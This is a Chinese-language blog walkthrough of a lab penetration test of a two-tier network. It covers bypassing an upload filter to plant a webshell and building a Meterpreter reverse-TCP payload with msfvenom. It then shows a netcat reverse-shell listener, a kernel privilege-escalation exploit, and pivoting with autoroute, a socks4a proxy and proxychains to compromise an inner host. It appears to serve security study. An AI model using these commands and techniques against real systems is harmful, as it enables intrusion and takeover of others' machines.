大家好,又见面了,我是你们的朋友全栈君。
实验目的:利用代理功能对2层网络进行渗透
测试靶机 ubantu 192.168.31.207 192.168.1.129
ubantu 192.168.1.100
首先访问192.168.31.207
一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将
改为
放包就上传成功了
菜刀连接文件地址
kali打开msf控制台,设置模块exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.31.43 set LPORT 8888
利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf 利用菜刀上传php大马,并将生成的elf木马上传到目标机 进入大马进行反弹shell提权 kali本地监听12388端口 nc -lvvp 12388
大马进行反弹shell
反弹成功
uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本 gcc shell.c -o shell ./shell 提权成功
我们给上传的elf木马权限并执行 chmod 777 1.elf ./elf
成功获得一个会话连接
添加一个路由 run autoroute -s 192.168.1.0/24
本地设置socks4代理 use auxiliary/server/socks4a set SRVPORT 9999 开启新的终端 编辑 vim /etc/proxychains.conf
将设置的socks4添加进末尾 代理打开firefox
访问192.168.1.100
弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3
添加新文章上传php大马
直接拖拽成功上传后,可以查看路径,直接访问地址
由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了 以上操作仅供大家学习参考使用,
发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/147667.html原文链接:https://javaforall.cn